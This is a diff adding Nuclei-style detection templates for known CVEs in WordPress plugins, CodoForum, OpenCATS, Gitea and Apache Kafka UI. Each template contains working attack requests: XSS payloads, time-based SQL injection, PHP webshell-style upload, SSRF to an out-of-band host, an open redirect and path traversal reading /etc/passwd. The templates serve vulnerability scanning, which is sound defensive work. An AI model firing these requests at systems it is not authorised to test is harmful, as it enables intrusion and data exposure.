AAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=")}}
|
||||
--336b29d7aee0463d8b651303eab505ea--
|
||||
|
||||
- |
|
||||
GET /index.php?activate=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
extractors:
|
||||
- type: regex
|
||||
name: nonce
|
||||
group: 1
|
||||
regex:
|
||||
- 'admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}'
|
||||
internal: true
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_4
|
||||
words:
|
||||
- '5f9bc5edd71c78284dabe630df8cd71d'
|
|
@ -0,0 +1,53 @@
|
|||
id: CVE-2022-1398
|
||||
|
||||
info:
|
||||
name: External Media without Import <= 1.1.2 - Authenticated Blind SSRF
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
The External Media without Import WordPress plugin through 1.1.2 does not have any authorisation and does to ensure that medias added via URLs are external medias, which could allow any authenticated users, such as subscriber to perform blind SSRF attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/5440d177-e995-403e-b2c9-42ceda14579e
|
||||
- https://wordpress.org/plugins/external-media-without-import/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1398
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 6.5
|
||||
cve-id: CVE-2022-1398
|
||||
cwe-id: CWE-981
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,wpscan,external-media-without-import,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/upload.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /wp-admin/admin-post.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
urls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- "external-media-without-import"
|
|
@ -0,0 +1,85 @@
|
|||
id: CVE-2022-31854
|
||||
|
||||
info:
|
||||
name: CodoForum v5.1 - Remote Code Execution
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
Codoforum v5.1 was discovered to contain an arbitrary file upload vulnerability via the logo change option in the admin panel.
|
||||
reference:
|
||||
- https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31854
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2022-31854
|
||||
cwe-id: CWE-434
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,rce,codoforumrce,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /admin/?page=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB
|
||||
|
||||
------WebKitFormBoundaryACGPpj7UIqmtLNbB
|
||||
Content-Disposition: form-data; name="username"
|
||||
|
||||
{{username}}
|
||||
------WebKitFormBoundaryACGPpj7UIqmtLNbB
|
||||
Content-Disposition: form-data; name="password"
|
||||
|
||||
{{password}}
|
||||
------WebKitFormBoundaryACGPpj7UIqmtLNbB--
|
||||
|
||||
- |
|
||||
GET /admin/index.php?page=config HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /admin/index.php?page=config HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA
|
||||
|
||||
------WebKitFormBoundaryoLtdjuqj2ixPvBhA
|
||||
Content-Disposition: form-data; name="site_title"
|
||||
|
||||
|
||||
------WebKitFormBoundaryoLtdjuqj2ixPvBhA
|
||||
Content-Disposition: form-data; name="forum_logo"; filename="{{randstr}}.php"
|
||||
Content-Type: application/x-httpd-php
|
||||
|
||||
<?php
|
||||
|
||||
echo md5('CVE-2022-31854');
|
||||
|
||||
?>
|
||||
------WebKitFormBoundaryoLtdjuqj2ixPvBhA
|
||||
Content-Disposition: form-data; name="CSRF_token"
|
||||
|
||||
{{csrf}}
|
||||
------WebKitFormBoundaryoLtdjuqj2ixPvBhA--
|
||||
|
||||
- |
|
||||
GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_4 == 200'
|
||||
- 'contains(content_type_4, "text/html")'
|
||||
- 'contains(body_4, "a63fd49130de6406a66600cd8caa162f")'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf
|
||||
group: 1
|
||||
regex:
|
||||
- 'name="CSRF_token" value="([0-9a-zA-Z]+)"/>'
|
||||
internal: true
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2022-3908
|
||||
|
||||
info:
|
||||
name: Helloprint < 1.4.7 - Cross-Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
The Helloprint WordPress plugin before 1.4.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
|
||||
remediation: Fixed in version 1.4.7
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/c44802a0-8cbe-4386-9523-3b6cb44c6505
|
||||
- https://wordpress.org/plugins/helloprint/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-3908
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-3908
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,xss,wordpress,wp-plugin,wp,helloprint,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=language-translate.php&success=added"><script>alert(`XSS`)<%2Fscript> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(content_type_2, "text/html")'
|
||||
- 'contains(body_2, "Translation added\\\"><script>alert(`XSS`)</script> successfully")'
|
||||
condition: and
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2022-3933
|
||||
|
||||
info:
|
||||
name: Essential Real Estate - Cross Site Scripting
|
||||
author: r3Y3r53
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin does not sanitize and escapes some parameters, which could allow users with a role as low as Admin to perform Cross-Site Scripting attacks.
|
||||
remediation: Fixed in version 3.9.6
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6395f3f1-5cdf-4c55-920c-accc0201baf4
|
||||
- https://wordpress.org/plugins/essential-real-estate/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-3933
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2022-3933
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,xss,wordpress,wp-plugin,wp,essential-real-estate,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&columns_gap=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C!-- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(all_headers_2, "text/html")'
|
||||
- 'contains(body_2, "><script>alert(document.domain)</script>")'
|
||||
- 'contains(body_2, "ere_property_gallery")'
|
||||
condition: and
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2022-4117
|
||||
|
||||
info:
|
||||
name: IWS Geo Form Fields <= 1.0 - Unauthenticated SQL Injection
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
The IWS WordPress plugin through 1.0 does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/1fac3eb4-13c0-442d-b27c-7b7736208193
|
||||
- https://wordpress.org/plugins/iws-geo-form-fields/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-4117
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-4117
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
country_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(body, "\"status\":200") && contains(body, "{\"html\":")'
|
||||
condition: and
|
|
@ -0,0 +1,42 @@
|
|||
id: CVE-2022-4320
|
||||
|
||||
info:
|
||||
name: WordPress Events Calendar Plugin - Cross-Site Scripting
|
||||
author: r3Y3r53
|
||||
severity: medium
|
||||
description: |
|
||||
WordPress Events Calendar Plugin < 1.4.5 - Multiple Reflected XSS
|
||||
remediation: Fixed in version 1.4.5
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-4320
|
||||
- https://wpscan.com/vulnerability/f1244c57-d886-4a6e-8cdb-18404e8c153c
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2022,wordpress,wp,wp-plugin,calendar,event,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX"><script>alert(document.cookie)</script>'
|
||||
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>'
|
||||
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'imgNavLeftXX\"><script>alert(document.cookie)</script>'
|
||||
- '<script>alert(document.cookie)</script>({});'
|
||||
- '><script>alert(document.cookie)</script>.js'
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2022-4325
|
||||
|
||||
info:
|
||||
name: Post Status Notifier Lite < 1.10.1 - Cross Site Scripting
|
||||
author: r3Y3r53
|
||||
severity: medium
|
||||
description: |
|
||||
The Post Status Notifier Lite WordPress plugin before 1.10.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which can be used against high privilege users such as admin.
|
||||
remediation: Fixed in version 1.10.1
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/5b983c48-6b05-47cf-85cb-28bbeec17395
|
||||
- https://wordpress.org/plugins/post-status-notifier-lite/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-4325
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-4325
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,xss,wp,wp-plugin,wordpress,post-status-notifier-lite,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(all_headers_2, "text/html")'
|
||||
- 'contains(body_2, "<script>alert(`document.domain`)</script>")'
|
||||
- 'contains(body_2, "Post Status Notifier Lite")'
|
||||
condition: and
|
|
@ -0,0 +1,42 @@
|
|||
id: CVE-2023-0236
|
||||
|
||||
info:
|
||||
name: Tutor LMS < 2.0.10 - Cross Site Scripting
|
||||
author: r3Y3r53
|
||||
severity: medium
|
||||
description: |
|
||||
The Tutor LMS WordPress plugin before 2.0.10 does not sanitise and escape the reset_key and user_id parameters before outputting then back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
|
||||
remediation: Fixed in version 2.0.10
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/503835db-426d-4b49-85f7-c9a20d6ff5b8
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-0236
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-0236
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_2, "<svg onload=prompt(document.domain)>")'
|
||||
- 'contains(body_2, "Instructor Registration")'
|
||||
condition: and
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2023-0261
|
||||
|
||||
info:
|
||||
name: WP TripAdvisor Review Slider < 10.8 - Subscriber+ SQLi
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
The WP TripAdvisor Review Slider WordPress plugin before 10.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.
|
||||
remediation: Fixed in version 10.8
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6a3b6752-8d72-4ab4-9d49-b722a947d2b0
|
||||
- https://wordpress.org/plugins/wp-tripadvisor-review-slider/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-0261
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2023-0261
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,wp-tripadvisor-review-slider,auth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
content-type: application/x-www-form-urlencoded
|
||||
|
||||
action=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid="1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)"]
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_2>=6'
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(content_type_2, "application/json")'
|
||||
- 'contains(body_2, "\"data\":{")'
|
||||
condition: and
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2023-27292
|
||||
|
||||
info:
|
||||
name: OpenCATS - Open Redirect
|
||||
author: r3Y3r53
|
||||
severity: medium
|
||||
description: |
|
||||
An open redirect vulnerability exposes OpenCATS to template injection due to improper validation of user-supplied GET parameters.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2023-8
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-27292
|
||||
classification:
|
||||
cve-id: CVE-2023-27292
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"opencats"
|
||||
tags: cve,cve2023,opencats,redirect,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /index.php?m=login&a=attemptLogin HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username={{username}}&password={{password}}
|
||||
|
||||
- |
|
||||
GET /index.php?m=settings&a=previewPage&url=https://oast.me HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
host-redirects: true
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<TITLE>Page Preview</TITLE>'
|
||||
- '<FRAME src="https://oast.me">'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: unauth-apache-kafka-ui
|
||||
|
||||
info:
|
||||
name: Apache Kafka - Unauthorized UI Exposure
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: Unauthorized access to apache kakfa UI.
|
||||
reference:
|
||||
- https://www.acunetix.com/vulnerabilities/web/apache-kafka-unauthorized-access-vulnerability
|
||||
- https://github.com/provectus/kafka-ui
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"UI for Apache Kafka"
|
||||
tags: misconfig,apache,kafka,unauth,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
- '{{BaseURL}}/ui/clusters/kafka-ui/brokers'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<title>UI for Apache Kafka</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,60 @@
|
|||
id: gitea-rce
|
||||
|
||||
info:
|
||||
name: Gitea 1.4.0 - Remote Code Execution
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Gitea 1.4.0 is vulnerable to remote code execution.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/44996
|
||||
- https://github.com/kacperszurek/exploits/blob/master/Gitea/gitea_lfs_rce.py
|
||||
metadata:
|
||||
verified: "true"
|
||||
shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"'
|
||||
tags: gitea,rce,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /api/v1/repos/search?limit=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /{{repo}}.git/info/lfs/objects HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
Accept: application/vnd.git-lfs+json
|
||||
|
||||
{
|
||||
"Oid": "....../../../etc/passwd",
|
||||
"Size": 1000000,
|
||||
"User" : "{{randstr}}",
|
||||
"Password" : "{{randstr}}",
|
||||
"Repo" : "{{randstr}}",
|
||||
"Authorization" : "{{randstr}}"
|
||||
}
|
||||
|
||||
- |
|
||||
GET /{{repo}}.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body_3
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: word
|
||||
part: header_3
|
||||
words:
|
||||
- "application/octet-stream"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: repo
|
||||
group: 1
|
||||
regex:
|
||||
- '"name":".*","full_name":"(.*)","description"'
|
||||
internal: true
|
Loading…
Reference in New Issue